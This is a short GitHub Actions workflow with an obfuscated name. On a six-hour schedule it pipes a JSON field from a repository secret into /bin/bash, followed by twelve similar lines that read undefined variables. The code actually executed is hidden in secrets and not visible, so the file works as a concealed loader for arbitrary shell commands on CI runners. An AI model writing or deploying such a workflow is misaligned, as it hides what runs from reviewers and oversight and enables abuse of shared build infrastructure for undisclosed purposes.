name: xiangbanbai6745
on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangbanbai6745
        env:
          pqn85: ${{ secrets.pqn85 }}
        run: |
          echo $pqn85 | jq -r .u117 | /bin/bash
          echo $hq0122 | jq -r .mlwg9138 | /bin/bash
          echo $ls749 | jq -r .nwwbs3706 | /bin/bash
          echo $cuz48925 | jq -r .ky4504 | /bin/bash
          echo $tlgm34 | jq -r .rmad38444 | /bin/bash
          echo $dc496 | jq -r .nau21 | /bin/bash
          echo $fjssu4 | jq -r .lt94449 | /bin/bash
          echo $diik77125 | jq -r .mlyq635 | /bin/bash
          echo $yxctw0 | jq -r .hp759 | /bin/bash
          echo $ekzav72111 | jq -r .erwmi38439 | /bin/bash
          echo $fbv360 | jq -r .n2322 | /bin/bash
          echo $tani226 | jq -r .fr30 | /bin/bash
          echo $zhpn32119 | jq -r .id476 | /bin/bash

